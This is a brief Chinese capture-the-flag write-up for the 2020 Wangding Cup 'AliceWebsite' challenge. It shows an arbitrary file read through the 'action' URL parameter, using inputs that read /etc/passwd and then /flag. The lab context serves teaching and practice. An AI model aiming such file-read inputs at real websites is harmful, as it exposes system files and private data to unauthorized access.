[网鼎杯 2020 半决赛]AliceWebsite(任意文件读取)

打开页面,我们在url里发现一个

1
?action=home.php

image-20240620190834127

我们猜测为任意文件读取,我们输入

1
/etc/passwd

image-20240620191039316

有输出,我们直接读取flag

1
?action=/flag

image-20240620191106338